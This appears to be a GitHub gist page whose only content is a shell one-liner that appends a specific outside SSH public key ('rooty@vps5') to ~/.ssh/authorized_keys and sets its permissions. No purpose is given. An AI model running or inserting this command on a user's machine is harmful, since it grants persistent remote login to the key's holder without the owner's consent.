Skip to content

Instantly share code, notes, and snippets.

@zipizap
Created February 9, 2019 00:24
Show Gist options
  • Save zipizap/c38f7911f65c4e1029cb8a8f22a000d0 to your computer and use it in GitHub Desktop.
Save zipizap/c38f7911f65c4e1029cb8a8f22a000d0 to your computer and use it in GitHub Desktop.

Revisions

  1. zipizap created this gist Feb 9, 2019.
    1 change: 1 addition & 0 deletions gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1 @@
    cd && mkdir -p ~/.ssh && echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFxm8WlYkMTMI4VJSl8+VxnYuPjC7mbpF1SUeG8grz1r rooty@vps5' >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys